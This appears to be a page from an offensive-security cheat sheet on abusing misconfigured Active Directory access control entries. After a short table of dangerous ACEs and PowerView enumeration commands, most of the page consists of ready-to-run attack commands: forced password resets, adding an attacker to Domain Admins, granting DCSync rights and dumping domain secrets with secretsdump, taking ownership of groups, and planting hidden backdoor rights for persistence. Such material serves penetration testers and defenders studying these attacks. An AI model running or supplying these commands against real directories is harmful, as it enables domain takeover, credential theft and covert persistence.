Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
AD objects have DACLs (Discretionary Access Control Lists) controlling access. Misconfigured ACLs grant powerful privileges to low-privilege users.
Dangerous ACEs
| ACE | Allows |
|---|
| GenericAll | Full control over object |
| GenericWrite | Write any property |
| WriteDacl | Modify DACL (grant yourself permissions) |
| WriteOwner | Change object owner |
| ForceChangePassword | Reset user password |
| AddMember | Add member to group |
| AllExtendedRights | Change password, read LAPS, etc. |
Find Dangerous ACLs
PowerView
Find-InterestingDomainAcl -ResolveGUIDs
Get-ObjectAcl -SamAccountName USER -ResolveGUIDs
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
BloodHound
Edges: GenericAll, WriteDacl, WriteOwner, ForceChangePassword, AddMember.
Exploit — GenericAll on User
Reset Password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
net rpc password targetuser 'NewPass123!' -U 'DOMAIN/attacker%password' -S DC_IP
Set SPN (Targeted Kerberoasting)
Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
Exploit — GenericAll on Group
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
net group "Domain Admins" attacker /add /domain
Exploit — GenericAll on Computer
# RBCD
Set-ADComputer TARGET$ -PrincipalsAllowedToDelegateToAccount EVIL$
Exploit — WriteDacl
Grant yourself DCSync rights:
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync
impacket-secretsdump DOMAIN/attacker:password@DC_IP
Exploit — WriteOwner
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity attacker
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
Exploit — ForceChangePassword
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
rpcclient -U 'attacker%password' DC_IP -c "setuserinfo2 targetuser 23 'NewPass!'"
ACL Persistence
Add Hidden DCSync Rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights DCSync
Add GenericAll on Domain Admins
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor_user -Rights All
Quick Reference
| ACE | Exploit |
|---|
| GenericAll (user) | Reset password or targeted kerberoast |
| GenericAll (group) | Add yourself to group |
| WriteDacl | Grant DCSync rights |
| WriteOwner | Take ownership → full control |
| ForceChangePassword | Reset target password |